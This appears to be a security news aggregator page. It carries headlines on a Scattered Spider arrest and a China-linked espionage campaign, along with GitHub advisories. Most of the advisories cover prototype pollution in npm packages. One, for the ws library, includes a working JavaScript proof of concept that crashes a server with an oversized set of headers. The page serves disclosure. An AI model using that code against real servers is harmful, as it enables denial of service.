Security
Headlines
HeadlinesLatestCVEs

Tag

#git

Scattered Spider Boss Cuffed in Spain Boarding a Flight to Italy

Accused of hacking into more than 45 companies in the US, a 22-year-old British man was arrested by Spanish police and found to be in control of more than $27 million in Bitcoin.

DARKReading
Open in Source
#git
GHSA-3h5v-q93c-6h6q: ws affected by a DoS when handling a request with many HTTP headers

### Impact A request with a number of headers exceeding the[`server.maxHeadersCount`][] threshold could be used to crash a ws server. ### Proof of concept ```js const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); }); ``` ### Patches The vulnerability was fixed in ws@...

GHSA-mj4p-gmhr-92g3: @akbr/update Prototype Pollution

akbr update 1.0.0 is vulnerable to Prototype Pollution via update/index.js.

GHSA-jj58-488v-4rgf: obx Prototype Pollution

almela obx before v.0.0.4 has a Prototype Pollution issue which allows arbitrary code execution via the obx/build/index.js:656), reduce (@almela/obx/build/index.js:470), Object.set (obx/build/index.js:269) component.

GHSA-j8px-pjmp-325f: flatten-json Prototype Pollution

A Prototype Pollution issue in flatten-json 1.0.1 allows an attacker to execute arbitrary code via module.exports.unflattenJSON (flatten-json/index.js:42)

GHSA-qj86-v6m7-4qv2: Object Resolver Prototype Pollution

apphp js-object-resolver < 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.

GHSA-4xg3-7w7q-856q: object-deep-assign Prototype Pollution

alexbinary object-deep-assign 1.0.11 is vulnerable to Prototype Pollution via the extend() method of Module.deepAssign (/src/index.js)

GHSA-69r2-2fg7-7hf9: Badger Database Prototype Pollution

A Prototype Pollution issue in abw badger-database 1.2.1 allows an attacker to execute arbitrary code via dist/badger-database.esm.

GHSA-fg52-5jjj-28h7: @cdr0/sg Prototype Pollution

A Prototype Pollution issue in cdr0 sg 1.0.10 allows an attacker to execute arbitrary code.

China-Linked Hackers Infiltrate East Asian Firm for 3 Years Using F5 Devices

A suspected China-nexus cyber espionage actor has been attributed as behind a prolonged attack against an unnamed organization located in East Asia for a period of about three years, with the adversary establishing persistence using legacy F5 BIG-IP appliances and using it as an internal command-and-control (C&C) for defense evasion purposes. Cybersecurity company Sygnia, which responded to